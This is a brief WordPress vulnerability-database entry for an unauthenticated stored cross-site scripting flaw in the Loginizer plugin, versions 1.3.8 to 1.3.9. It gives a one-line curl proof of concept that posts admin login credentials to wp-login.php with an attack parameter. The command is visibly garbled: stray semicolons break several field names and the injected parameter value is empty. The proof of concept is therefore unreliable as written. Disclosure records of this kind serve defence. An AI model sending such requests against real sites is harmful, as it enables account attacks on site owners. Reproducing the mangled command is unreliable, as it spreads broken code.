Loginizer 1.3.8-1.3.9 - Unauthenticated Stored Cross-Site Scripting (XSS)

2018-05-22T00:00:00
ID WPVDB-ID:9088
Type wpvulndb
Reporter Ryan
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - Loginizer 1.3.8-1.3.9 - Unauthenticated Stored Cross-Site Scripting (XSS) curl --data "log=admin&pwd;=admin&wp-submit;=Log+In&redirect;_to=&testcookie;=1" "http://www.example.com/wp-login.php?a="